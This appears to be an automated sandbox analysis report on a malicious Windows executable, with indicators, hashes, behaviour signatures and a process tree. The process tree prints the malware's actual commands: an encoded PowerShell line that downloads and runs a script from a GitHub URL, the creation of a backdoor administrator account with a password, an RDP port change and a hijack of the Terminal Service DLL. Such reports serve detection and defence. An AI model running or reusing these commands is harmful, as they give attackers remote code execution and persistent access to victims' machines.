Analysis

  • max time kernel
    73s
  • max time network
    75s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-09-2021 10:58

General

  • Target

    f71c575754e1f5890ad8b35afd08b8be.exe

  • Size

    5.9MB

  • MD5

    f71c575754e1f5890ad8b35afd08b8be

  • SHA1

    69803b96f3820fabd81c79d422a1fa2a72ccb699

  • SHA256

    046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

  • SHA512

    32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe
    "C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2376
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp" "c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP"
          4⤵
            PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3996
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2716
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2732
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2736
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3980
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:696
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2272
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4092
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:772
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3880
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3148
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3996
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1324
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1672
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:1860
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3728
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2720
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1016
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:1908
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc kEE2SQbH /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2692
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc kEE2SQbH /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3704
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc kEE2SQbH /add
                          3⤵
                            PID:1824
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2736
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3584
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:3596
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                            PID:4032
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4020
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                3⤵
                                  PID:2540
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2004
                              • C:\Windows\system32\net.exe
                                net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3588
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                  3⤵
                                    PID:3060
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user wgautilacc kEE2SQbH
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1812
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc kEE2SQbH
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3888
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user wgautilacc kEE2SQbH
                                    3⤵
                                      PID:1008
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic path win32_VideoController get name
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:808
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path win32_VideoController get name
                                    2⤵
                                      PID:2888
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C wmic CPU get NAME
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3264
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                        PID:724
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      1⤵
                                        PID:1676
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          2⤵
                                            PID:1016
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1824

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.dll

                                          MD5

                                          9323652b1acc8144cd7f9b5c427de0be

                                          SHA1

                                          62f129c8fa94caef13f521f27ea59963bbf2de5d

                                          SHA256

                                          503f533de2fbf5b965dfa3a87d1902ec22b117bf889554612bfe9f09aa783d02

                                          SHA512

                                          7099b41a1ed1f1a52d3a0f157cacafccfe85be55247cd93b43aa5d50e63fb0208a08c53270e92a10e2b9fe7e3579a611f905be362d76e262939ba43935629681

                                        • C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp

                                          MD5

                                          9768c473430cd54442caec6cecf6290b

                                          SHA1

                                          1b9d88a76e04e2cda6ef8ba9e9db7de9e1d09475

                                          SHA256

                                          88b9ab09d58f38cdf1de535fd6b6a652dbbb18fdd4c62ea1aced1a941395ffa7

                                          SHA512

                                          792f3c5a2dbcce288b8da0f0d4519efd18d38a1bccaaa901654b61f245812f546350b179dd5bc41d686dae0aea6d9dc581b4dbe01c60281516501b78f1f4209e

                                        • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                          MD5

                                          3447df88de7128bdc34942334b2fab98

                                          SHA1

                                          519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                          SHA256

                                          9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                          SHA512

                                          2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                        • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

                                          MD5

                                          78fc438bc0a10f68012273374fc242de

                                          SHA1

                                          1c2f8f958b4cfb2d822a50f97c1b503d039108d4

                                          SHA256

                                          14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0

                                          SHA512

                                          97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

                                        • \??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.0.cs

                                          MD5

                                          4864fc038c0b4d61f508d402317c6e9a

                                          SHA1

                                          72171db3eea76ecff3f7f173b0de0d277b0fede7

                                          SHA256

                                          0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                          SHA512

                                          9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                        • \??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline

                                          MD5

                                          63ac7ce4be7f3ac7dfe37acf755eb2b8

                                          SHA1

                                          0a845a897029f1e6d56c027482372a4d46818990

                                          SHA256

                                          9eef6644c357b0141f392ac23fb0917153d9c88f7b880c746ac85a3c8666491a

                                          SHA512

                                          bac15dcd1480198c2b6e60c407a2e9c3abf7aea53f2f7bb09b1f68eb3d95a3bc31ae6f0ea3dea064e0b780edf4487009435265c801eb21dfa72ffd6ce2610222

                                        • \??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP

                                          MD5

                                          6f14ca6f733aac5874406f403434e890

                                          SHA1

                                          673ecad46cadddf41c98002a3016fba445b09532

                                          SHA256

                                          8d1b2c523e60667998c5c82b7633398186661c9adcfd63a944f28504cd0d90d5

                                          SHA512

                                          50bdc21eae7146516687b7456637c323eee383f72869d0a35edb2e95ce0a4ba9d9fc8a4ab20d853a1f91377039da8b9322d0a21d6a4ae5dc9a354e90e5eff8b2

                                        • \Windows\Branding\mediasrv.png

                                          MD5

                                          07044622ac01aea214d75af177a9976f

                                          SHA1

                                          8647e016414d4ef1da52abcf889210f15c58a640

                                          SHA256

                                          e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9

                                          SHA512

                                          21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

                                        • \Windows\Branding\mediasvc.png

                                          MD5

                                          7c2b6a91963747383e5cdb168539962c

                                          SHA1

                                          cd987c6f69702bf0369b4c49c898052fae21d513

                                          SHA256

                                          fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61

                                          SHA512

                                          8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

                                        • memory/636-114-0x0000018766CA0000-0x00000187670C0000-memory.dmp

                                          Filesize

                                          4.1MB

                                        • memory/636-118-0x0000018766865000-0x0000018766866000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/636-119-0x0000018766866000-0x0000018766867000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/636-116-0x0000018766860000-0x0000018766862000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/636-117-0x0000018766863000-0x0000018766865000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/696-350-0x0000000000000000-mapping.dmp

                                        • memory/724-375-0x0000000000000000-mapping.dmp

                                        • memory/772-355-0x0000000000000000-mapping.dmp

                                        • memory/1008-373-0x0000000000000000-mapping.dmp

                                        • memory/1016-363-0x0000000000000000-mapping.dmp

                                        • memory/1016-376-0x0000000000000000-mapping.dmp

                                        • memory/1268-136-0x000001EFE40F3000-0x000001EFE40F5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1268-153-0x000001EFE40F8000-0x000001EFE40F9000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-154-0x000001EFFEEA0000-0x000001EFFEEA1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-155-0x000001EFFF230000-0x000001EFFF231000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-126-0x000001EFE44A0000-0x000001EFE44A1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-142-0x000001EFE40F6000-0x000001EFE40F8000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1268-135-0x000001EFE40F0000-0x000001EFE40F2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1268-131-0x000001EFFE860000-0x000001EFFE861000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-147-0x000001EFE44D0000-0x000001EFE44D1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1268-120-0x0000000000000000-mapping.dmp

                                        • memory/1324-359-0x0000000000000000-mapping.dmp

                                        • memory/1672-360-0x0000000000000000-mapping.dmp

                                        • memory/1824-395-0x0000028E694D6000-0x0000028E694D8000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1824-389-0x0000028E694D0000-0x0000028E694D2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1824-446-0x0000028E694D8000-0x0000028E694D9000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1824-366-0x0000000000000000-mapping.dmp

                                        • memory/1824-390-0x0000028E694D3000-0x0000028E694D5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1824-377-0x0000000000000000-mapping.dmp

                                        • memory/1860-459-0x0000000000000000-mapping.dmp

                                        • memory/1908-364-0x0000000000000000-mapping.dmp

                                        • memory/2272-353-0x0000000000000000-mapping.dmp

                                        • memory/2376-139-0x0000000000000000-mapping.dmp

                                        • memory/2540-369-0x0000000000000000-mapping.dmp

                                        • memory/2608-143-0x0000000000000000-mapping.dmp

                                        • memory/2716-310-0x0000000000000000-mapping.dmp

                                        • memory/2732-311-0x0000000000000000-mapping.dmp

                                        • memory/2736-312-0x0000000000000000-mapping.dmp

                                        • memory/2888-374-0x0000000000000000-mapping.dmp

                                        • memory/3060-371-0x0000000000000000-mapping.dmp

                                        • memory/3148-357-0x0000000000000000-mapping.dmp

                                        • memory/3584-367-0x0000000000000000-mapping.dmp

                                        • memory/3588-370-0x0000000000000000-mapping.dmp

                                        • memory/3596-368-0x0000000000000000-mapping.dmp

                                        • memory/3704-365-0x0000000000000000-mapping.dmp

                                        • memory/3728-460-0x0000000000000000-mapping.dmp

                                        • memory/3880-356-0x0000000000000000-mapping.dmp

                                        • memory/3888-372-0x0000000000000000-mapping.dmp

                                        • memory/3896-252-0x00000170D2248000-0x00000170D224A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3896-208-0x0000000000000000-mapping.dmp

                                        • memory/3896-219-0x00000170D2243000-0x00000170D2245000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3896-218-0x00000170D2240000-0x00000170D2242000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3896-251-0x00000170D2246000-0x00000170D2248000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3980-349-0x0000000000000000-mapping.dmp

                                        • memory/3996-358-0x0000000000000000-mapping.dmp

                                        • memory/3996-290-0x0000024D40243000-0x0000024D40245000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3996-249-0x0000000000000000-mapping.dmp

                                        • memory/3996-300-0x0000024D40248000-0x0000024D4024A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3996-289-0x0000024D40240000-0x0000024D40242000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3996-291-0x0000024D40246000-0x0000024D40248000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4020-217-0x0000019DDFBE8000-0x0000019DDFBEA000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4020-178-0x0000019DDFBE6000-0x0000019DDFBE8000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4020-174-0x0000019DDFBE0000-0x0000019DDFBE2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4020-175-0x0000019DDFBE3000-0x0000019DDFBE5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4020-162-0x0000000000000000-mapping.dmp

                                        • memory/4092-354-0x0000000000000000-mapping.dmp